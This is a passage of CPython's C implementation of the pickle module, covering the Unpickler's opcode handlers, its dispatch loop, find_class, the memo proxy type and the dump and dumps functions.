Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
}
}
return 0;
}
static int
load_append(UnpicklerObject *self)
{
if (Py_SIZE(self->stack) - 1 <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
return do_append(self, Py_SIZE(self->stack) - 1);
}
static int
load_appends(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_append(self, i);
}
static int
do_setitems(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value, *key;
PyObject *dict;
Py_ssize_t len, i;
int status = 0;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
if ((len - x) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
        /* Corrupt or hostile pickle -- we never write one like this. */
PyErr_SetString(st->UnpicklingError,
"odd number of items for SETITEMS");
return -1;
}
/* Here, dict does not actually need to be a PyDict; it could be anything
that supports the __setitem__ attribute. */
dict = self->stack->data[x - 1];
for (i = x + 1; i < len; i += 2) {
key = self->stack->data[i - 1];
value = self->stack->data[i];
if (PyObject_SetItem(dict, key, value) < 0) {
status = -1;
break;
}
}
Pdata_clear(self->stack, x);
return status;
}
static int
load_setitem(UnpicklerObject *self)
{
return do_setitems(self, Py_SIZE(self->stack) - 2);
}
static int
load_setitems(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_setitems(self, i);
}
static int
load_additems(UnpicklerObject *self)
{
PyObject *set;
Py_ssize_t mark, len, i;
mark = marker(self);
if (mark < 0)
return -1;
len = Py_SIZE(self->stack);
if (mark > len || mark <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == mark) /* nothing to do */
return 0;
set = self->stack->data[mark - 1];
if (PySet_Check(set)) {
PyObject *items;
int status;
items = Pdata_poptuple(self->stack, mark);
if (items == NULL)
return -1;
status = _PySet_Update(set, items);
Py_DECREF(items);
return status;
}
else {
PyObject *add_func;
_Py_IDENTIFIER(add);
add_func = _PyObject_GetAttrId(set, &PyId_add);
if (add_func == NULL)
return -1;
for (i = mark; i < len; i++) {
PyObject *result;
PyObject *item;
item = self->stack->data[i];
result = _Pickle_FastCall(add_func, item);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = mark;
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = mark;
}
return 0;
}
static int
load_build(UnpicklerObject *self)
{
PyObject *state, *inst, *slotstate;
PyObject *setstate;
int status = 0;
_Py_IDENTIFIER(__setstate__);
/* Stack is ... instance, state. We want to leave instance at
* the stack top, possibly mutated via instance.__setstate__(state).
*/
if (Py_SIZE(self->stack) - 2 < self->stack->fence)
return Pdata_stack_underflow(self->stack);
PDATA_POP(self->stack, state);
if (state == NULL)
return -1;
inst = self->stack->data[Py_SIZE(self->stack) - 1];
if (_PyObject_LookupAttrId(inst, &PyId___setstate__, &setstate) < 0) {
Py_DECREF(state);
return -1;
}
if (setstate != NULL) {
PyObject *result;
/* The explicit __setstate__ is responsible for everything. */
result = _Pickle_FastCall(setstate, state);
Py_DECREF(setstate);
if (result == NULL)
return -1;
Py_DECREF(result);
return 0;
}
/* A default __setstate__. First see whether state embeds a
* slot state dict too (a proto 2 addition).
*/
if (PyTuple_Check(state) && PyTuple_GET_SIZE(state) == 2) {
PyObject *tmp = state;
state = PyTuple_GET_ITEM(tmp, 0);
slotstate = PyTuple_GET_ITEM(tmp, 1);
Py_INCREF(state);
Py_INCREF(slotstate);
Py_DECREF(tmp);
}
else
slotstate = NULL;
/* Set inst.__dict__ from the state dict (if any). */
if (state != Py_None) {
PyObject *dict;
PyObject *d_key, *d_value;
Py_ssize_t i;
_Py_IDENTIFIER(__dict__);
if (!PyDict_Check(state)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "state is not a dictionary");
goto error;
}
dict = _PyObject_GetAttrId(inst, &PyId___dict__);
if (dict == NULL)
goto error;
i = 0;
while (PyDict_Next(state, &i, &d_key, &d_value)) {
/* normally the keys for instance attributes are
interned. we should try to do that here. */
Py_INCREF(d_key);
if (PyUnicode_CheckExact(d_key))
PyUnicode_InternInPlace(&d_key);
if (PyObject_SetItem(dict, d_key, d_value) < 0) {
Py_DECREF(d_key);
goto error;
}
Py_DECREF(d_key);
}
Py_DECREF(dict);
}
/* Also set instance attributes from the slotstate dict (if any). */
if (slotstate != NULL) {
PyObject *d_key, *d_value;
Py_ssize_t i;
if (!PyDict_Check(slotstate)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"slot state is not a dictionary");
goto error;
}
i = 0;
while (PyDict_Next(slotstate, &i, &d_key, &d_value)) {
if (PyObject_SetAttr(inst, d_key, d_value) < 0)
goto error;
}
}
if (0) {
error:
status = -1;
}
Py_DECREF(state);
Py_XDECREF(slotstate);
return status;
}
static int
load_mark(UnpicklerObject *self)
{
/* Note that we split the (pickle.py) stack into two stacks, an
* object stack and a mark stack. Here we push a mark onto the
* mark stack.
*/
if (self->num_marks >= self->marks_size) {
size_t alloc = ((size_t)self->num_marks << 1) + 20;
Py_ssize_t *marks_new = self->marks;
PyMem_RESIZE(marks_new, Py_ssize_t, alloc);
if (marks_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->marks = marks_new;
self->marks_size = (Py_ssize_t)alloc;
}
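    /* Record the current object-stack height as the new mark and raise the
       fence so that later opcodes cannot pop objects created before it. */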
self->stack->mark_set = 1;
self->marks[self->num_marks++] = self->stack->fence = Py_SIZE(self->stack);
return 0;
}
static int
load_reduce(UnpicklerObject *self)
{
PyObject *callable = NULL;
PyObject *argtup = NULL;
PyObject *obj = NULL;
PDATA_POP(self->stack, argtup);
if (argtup == NULL)
return -1;
PDATA_POP(self->stack, callable);
if (callable) {
obj = PyObject_CallObject(callable, argtup);
Py_DECREF(callable);
}
Py_DECREF(argtup);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
/* Just raises an error if we don't know the protocol specified. PROTO
* is the first opcode for protocols >= 2.
*/
static int
load_proto(UnpicklerObject *self)
{
char *s;
int i;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
i = (unsigned char)s[0];
if (i <= HIGHEST_PROTOCOL) {
self->proto = i;
return 0;
}
PyErr_Format(PyExc_ValueError, "unsupported pickle protocol: %d", i);
return -1;
}
static int
load_frame(UnpicklerObject *self)
{
char *s;
Py_ssize_t frame_len;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
frame_len = calc_binsize(s, 8);
if (frame_len < 0) {
PyErr_Format(PyExc_OverflowError,
"FRAME length exceeds system's maximum of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, frame_len) < 0)
return -1;
/* Rewind to start of frame */
self->next_read_idx -= frame_len;
return 0;
}
static PyObject *
load(UnpicklerObject *self)
{
PyObject *value = NULL;
char *s = NULL;
self->num_marks = 0;
self->stack->mark_set = 0;
self->stack->fence = 0;
self->proto = 0;
if (Py_SIZE(self->stack))
Pdata_clear(self->stack, 0);
/* Convenient macros for the dispatch while-switch loop just below. */
#define OP(opcode, load_func) \
case opcode: if (load_func(self) < 0) break; continue;
#define OP_ARG(opcode, load_func, arg) \
case opcode: if (load_func(self, (arg)) < 0) break; continue;
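    /* For instance, OP(NONE, load_none) expands to
           case NONE: if (load_none(self) < 0) break; continue;
       so a failing handler breaks out of the switch, after which the
       unconditional break below ends the dispatch loop. */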
while (1) {
if (_Unpickler_Read(self, &s, 1) < 0) {
PickleState *st = _Pickle_GetGlobalState();
if (PyErr_ExceptionMatches(st->UnpicklingError)) {
PyErr_Format(PyExc_EOFError, "Ran out of input");
}
return NULL;
}
switch ((enum opcode)s[0]) {
OP(NONE, load_none)
OP(BININT, load_binint)
OP(BININT1, load_binint1)
OP(BININT2, load_binint2)
OP(INT, load_int)
OP(LONG, load_long)
OP_ARG(LONG1, load_counted_long, 1)
OP_ARG(LONG4, load_counted_long, 4)
OP(FLOAT, load_float)
OP(BINFLOAT, load_binfloat)
OP_ARG(SHORT_BINBYTES, load_counted_binbytes, 1)
OP_ARG(BINBYTES, load_counted_binbytes, 4)
OP_ARG(BINBYTES8, load_counted_binbytes, 8)
OP_ARG(SHORT_BINSTRING, load_counted_binstring, 1)
OP_ARG(BINSTRING, load_counted_binstring, 4)
OP(STRING, load_string)
OP(UNICODE, load_unicode)
OP_ARG(SHORT_BINUNICODE, load_counted_binunicode, 1)
OP_ARG(BINUNICODE, load_counted_binunicode, 4)
OP_ARG(BINUNICODE8, load_counted_binunicode, 8)
OP_ARG(EMPTY_TUPLE, load_counted_tuple, 0)
OP_ARG(TUPLE1, load_counted_tuple, 1)
OP_ARG(TUPLE2, load_counted_tuple, 2)
OP_ARG(TUPLE3, load_counted_tuple, 3)
OP(TUPLE, load_tuple)
OP(EMPTY_LIST, load_empty_list)
OP(LIST, load_list)
OP(EMPTY_DICT, load_empty_dict)
OP(DICT, load_dict)
OP(EMPTY_SET, load_empty_set)
OP(ADDITEMS, load_additems)
OP(FROZENSET, load_frozenset)
OP(OBJ, load_obj)
OP(INST, load_inst)
OP(NEWOBJ, load_newobj)
OP(NEWOBJ_EX, load_newobj_ex)
OP(GLOBAL, load_global)
OP(STACK_GLOBAL, load_stack_global)
OP(APPEND, load_append)
OP(APPENDS, load_appends)
OP(BUILD, load_build)
OP(DUP, load_dup)
OP(BINGET, load_binget)
OP(LONG_BINGET, load_long_binget)
OP(GET, load_get)
OP(MARK, load_mark)
OP(BINPUT, load_binput)
OP(LONG_BINPUT, load_long_binput)
OP(PUT, load_put)
OP(MEMOIZE, load_memoize)
OP(POP, load_pop)
OP(POP_MARK, load_pop_mark)
OP(SETITEM, load_setitem)
OP(SETITEMS, load_setitems)
OP(PERSID, load_persid)
OP(BINPERSID, load_binpersid)
OP(REDUCE, load_reduce)
OP(PROTO, load_proto)
OP(FRAME, load_frame)
OP_ARG(EXT1, load_extension, 1)
OP_ARG(EXT2, load_extension, 2)
OP_ARG(EXT4, load_extension, 4)
OP_ARG(NEWTRUE, load_bool, Py_True)
OP_ARG(NEWFALSE, load_bool, Py_False)
case STOP:
break;
default:
{
PickleState *st = _Pickle_GetGlobalState();
unsigned char c = (unsigned char) *s;
if (0x20 <= c && c <= 0x7e && c != '\'' && c != '\\') {
PyErr_Format(st->UnpicklingError,
"invalid load key, '%c'.", c);
}
else {
PyErr_Format(st->UnpicklingError,
"invalid load key, '\\x%02x'.", c);
}
return NULL;
}
}
break; /* and we are done! */
}
if (PyErr_Occurred()) {
return NULL;
}
if (_Unpickler_SkipConsumed(self) < 0)
return NULL;
PDATA_POP(self->stack, value);
return value;
}
/*[clinic input]
_pickle.Unpickler.load
Load a pickle.
Read a pickled object representation from the open file object given
in the constructor, and return the reconstituted object hierarchy
specified therein.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_load_impl(UnpicklerObject *self)
/*[clinic end generated code: output=fdcc488aad675b14 input=acbb91a42fa9b7b9]*/
{
UnpicklerObject *unpickler = (UnpicklerObject*)self;
/* Check whether the Unpickler was initialized correctly. This prevents
       segfaulting if a subclass overrides __init__ with a function that does
not call Unpickler.__init__(). Here, we simply ensure that self->read
is not NULL. */
if (unpickler->read == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"Unpickler.__init__() was not called by %s.__init__()",
Py_TYPE(unpickler)->tp_name);
return NULL;
}
return load(unpickler);
}
/* The name of find_class() is misleading. In newer pickle protocols, this
function is used for loading any global (i.e., functions), not just
classes. The name is kept only for backward compatibility. */
/*[clinic input]
_pickle.Unpickler.find_class
module_name: object
global_name: object
/
Return an object from a specified module.
If necessary, the module will be imported. Subclasses may override
this method (e.g. to restrict unpickling of arbitrary classes and
functions).
This method is called whenever a class or a function object is
needed. Both arguments passed are str objects.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_find_class_impl(UnpicklerObject *self,
PyObject *module_name,
PyObject *global_name)
/*[clinic end generated code: output=becc08d7f9ed41e3 input=e2e6a865de093ef4]*/
{
PyObject *global;
PyObject *module;
/* Try to map the old names used in Python 2.x to the new ones used in
Python 3.x. We do this only with old pickle protocols and when the
user has not disabled the feature. */
if (self->proto < 3 && self->fix_imports) {
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
/* Check if the global (i.e., a function or a class) was renamed
or moved to another module. */
key = PyTuple_Pack(2, module_name, global_name);
if (key == NULL)
return NULL;
item = PyDict_GetItemWithError(st->name_mapping_2to3, key);
Py_DECREF(key);
if (item) {
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"2-tuples, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = PyTuple_GET_ITEM(item, 0);
global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(module_name) ||
!PyUnicode_Check(global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"pairs of str, not (%.200s, %.200s)",
Py_TYPE(module_name)->tp_name,
Py_TYPE(global_name)->tp_name);
return NULL;
}
}
else if (PyErr_Occurred()) {
return NULL;
}
else {
/* Check if the module was renamed. */
item = PyDict_GetItemWithError(st->import_mapping_2to3, module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING values should be "
"strings, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = item;
}
else if (PyErr_Occurred()) {
return NULL;
}
}
}
module = PyImport_GetModule(module_name);
if (module == NULL) {
if (PyErr_Occurred())
return NULL;
module = PyImport_Import(module_name);
if (module == NULL)
return NULL;
}
global = getattribute(module, global_name, self->proto >= 4);
Py_DECREF(module);
return global;
}
/*[clinic input]
_pickle.Unpickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Unpickler___sizeof___impl(UnpicklerObject *self)
/*[clinic end generated code: output=119d9d03ad4c7651 input=13333471fdeedf5e]*/
{
Py_ssize_t res;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL)
res += self->memo_size * sizeof(PyObject *);
if (self->marks != NULL)
res += self->marks_size * sizeof(Py_ssize_t);
if (self->input_line != NULL)
res += strlen(self->input_line) + 1;
if (self->encoding != NULL)
res += strlen(self->encoding) + 1;
if (self->errors != NULL)
res += strlen(self->errors) + 1;
return res;
}
static struct PyMethodDef Unpickler_methods[] = {
_PICKLE_UNPICKLER_LOAD_METHODDEF
_PICKLE_UNPICKLER_FIND_CLASS_METHODDEF
_PICKLE_UNPICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Unpickler_dealloc(UnpicklerObject *self)
{
PyObject_GC_UnTrack((PyObject *)self);
Py_XDECREF(self->readline);
Py_XDECREF(self->read);
Py_XDECREF(self->peek);
Py_XDECREF(self->stack);
Py_XDECREF(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
PyMem_Free(self->input_line);
PyMem_Free(self->encoding);
PyMem_Free(self->errors);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Unpickler_traverse(UnpicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->readline);
Py_VISIT(self->read);
Py_VISIT(self->peek);
Py_VISIT(self->stack);
Py_VISIT(self->pers_func);
return 0;
}
static int
Unpickler_clear(UnpicklerObject *self)
{
Py_CLEAR(self->readline);
Py_CLEAR(self->read);
Py_CLEAR(self->peek);
Py_CLEAR(self->stack);
Py_CLEAR(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
self->marks = NULL;
PyMem_Free(self->input_line);
self->input_line = NULL;
PyMem_Free(self->encoding);
self->encoding = NULL;
PyMem_Free(self->errors);
self->errors = NULL;
return 0;
}
/*[clinic input]
_pickle.Unpickler.__init__
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static int
_pickle_Unpickler___init___impl(UnpicklerObject *self, PyObject *file,
int fix_imports, const char *encoding,
const char *errors)
/*[clinic end generated code: output=e2c8ce748edc57b0 input=f9b7da04f5f4f335]*/
{
_Py_IDENTIFIER(persistent_load);
/* In case of multiple __init__() calls, clear previous content. */
if (self->read != NULL)
(void)Unpickler_clear(self);
if (_Unpickler_SetInputStream(self, file) < 0)
return -1;
if (_Unpickler_SetInputEncoding(self, encoding, errors) < 0)
return -1;
self->fix_imports = fix_imports;
if (init_method_ref((PyObject *)self, &PyId_persistent_load,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
self->stack = (Pdata *)Pdata_New();
if (self->stack == NULL)
        return -1;
self->memo_size = 32;
self->memo = _Unpickler_NewMemo(self->memo_size);
if (self->memo == NULL)
return -1;
self->proto = 0;
return 0;
}
/* Define a proxy object for the Unpickler's internal memo object. This is to
* avoid breaking code like:
* unpickler.memo.clear()
* and
* unpickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*
* We do, however, have to implement pickling/unpickling support because of
* real-world code like cvs2svn.
*/
/*[clinic input]
_pickle.UnpicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_clear_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=d20cd43f4ba1fb1f input=b1df7c52e7afd9bd]*/
{
_Unpickler_MemoCleanup(self->unpickler);
self->unpickler->memo = _Unpickler_NewMemo(self->unpickler->memo_size);
if (self->unpickler->memo == NULL)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_copy_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=e12af7e9bc1e4c77 input=97769247ce032c1d]*/
{
size_t i;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
for (i = 0; i < self->unpickler->memo_size; i++) {
int status;
PyObject *key, *value;
value = self->unpickler->memo[i];
if (value == NULL)
continue;
key = PyLong_FromSsize_t(i);
if (key == NULL)
goto error;
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
if (status < 0)
goto error;
}
return new_memo;
error:
Py_DECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.__reduce__
Implement pickling support.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy___reduce___impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=6da34ac048d94cca input=6920862413407199]*/
{
PyObject *reduce_value;
PyObject *constructor_args;
PyObject *contents = _pickle_UnpicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
constructor_args = PyTuple_New(1);
if (constructor_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(constructor_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, constructor_args);
return reduce_value;
}
static PyMethodDef unpicklerproxy_methods[] = {
_PICKLE_UNPICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
UnpicklerMemoProxy_dealloc(UnpicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->unpickler);
PyObject_GC_Del((PyObject *)self);
}
static int
UnpicklerMemoProxy_traverse(UnpicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->unpickler);
return 0;
}
static int
UnpicklerMemoProxy_clear(UnpicklerMemoProxyObject *self)
{
Py_CLEAR(self->unpickler);
return 0;
}
static PyTypeObject UnpicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.UnpicklerMemoProxy", /*tp_name*/
sizeof(UnpicklerMemoProxyObject), /*tp_basicsize*/
    0,                                  /* tp_itemsize */
(destructor)UnpicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)UnpicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)UnpicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
unpicklerproxy_methods, /* tp_methods */
};
static PyObject *
UnpicklerMemoProxy_New(UnpicklerObject *unpickler)
{
UnpicklerMemoProxyObject *self;
self = PyObject_GC_New(UnpicklerMemoProxyObject,
&UnpicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(unpickler);
self->unpickler = unpickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Unpickler_get_memo(UnpicklerObject *self)
{
return UnpicklerMemoProxy_New(self);
}
static int
Unpickler_set_memo(UnpicklerObject *self, PyObject *obj)
{
PyObject **new_memo;
size_t new_memo_size = 0;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &UnpicklerMemoProxyType) {
UnpicklerObject *unpickler =
((UnpicklerMemoProxyObject *)obj)->unpickler;
new_memo_size = unpickler->memo_size;
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
for (size_t i = 0; i < new_memo_size; i++) {
Py_XINCREF(unpickler->memo[i]);
new_memo[i] = unpickler->memo[i];
}
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo_size = PyDict_GET_SIZE(obj);
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t idx;
if (!PyLong_Check(key)) {
PyErr_SetString(PyExc_TypeError,
"memo key must be integers");
goto error;
}
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred())
goto error;
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"memo key must be positive integers.");
goto error;
}
if (_Unpickler_MemoPut(self, idx, value) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be an UnpicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
_Unpickler_MemoCleanup(self);
self->memo_size = new_memo_size;
self->memo = new_memo;
return 0;
error:
if (new_memo_size) {
for (size_t i = new_memo_size - 1; i != SIZE_MAX; i--) {
Py_XDECREF(new_memo[i]);
}
PyMem_FREE(new_memo);
}
return -1;
}
static PyObject *
Unpickler_get_persload(UnpicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_load");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Unpickler_set_persload(UnpicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_load must be a callable taking "
"one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyGetSetDef Unpickler_getsets[] = {
{"memo", (getter)Unpickler_get_memo, (setter)Unpickler_set_memo},
{"persistent_load", (getter)Unpickler_get_persload,
(setter)Unpickler_set_persload},
{NULL}
};
static PyTypeObject Unpickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Unpickler", /*tp_name*/
sizeof(UnpicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Unpickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Unpickler___init____doc__, /*tp_doc*/
(traverseproc)Unpickler_traverse, /*tp_traverse*/
(inquiry)Unpickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Unpickler_methods, /*tp_methods*/
0, /*tp_members*/
Unpickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Unpickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/*[clinic input]
_pickle.dump
obj: object
file: object
protocol: object = NULL
*
fix_imports: bool = True
Write a pickled representation of obj to the open file object file.
This is equivalent to ``Pickler(file, protocol).dump(obj)``, but may
be more efficient.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4 and is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dump_impl(PyObject *module, PyObject *obj, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=a4774d5fde7d34de input=93f1408489a87472]*/
{
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (_Pickler_SetOutputStream(pickler, file) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
if (_Pickler_FlushToFile(pickler) < 0)
goto error;
Py_DECREF(pickler);
Py_RETURN_NONE;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.dumps
obj: object
protocol: object = NULL
*
fix_imports: bool = True
Return the pickled representation of the object as a bytes object.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4 and is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
If *fix_imports* is True and *protocol* is less than 3, pickle will
try to map the new Python 3 names to the old module names used in
Python 2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dumps_impl(PyObject *module, PyObject *obj, PyObject *protocol,
int fix_imports)
/*[clinic end generated code: output=d75d5cda456fd261 input=b6efb45a7d19b5ab]*/
{
PyObject *result;
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
result = _Pickler_GetString(pickler);
Py_DECREF(pickler);
return result;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.load
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the pickle data stored in a file.
This is equivalent to ``Unpickler(file).load()``, but may be more
efficient.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
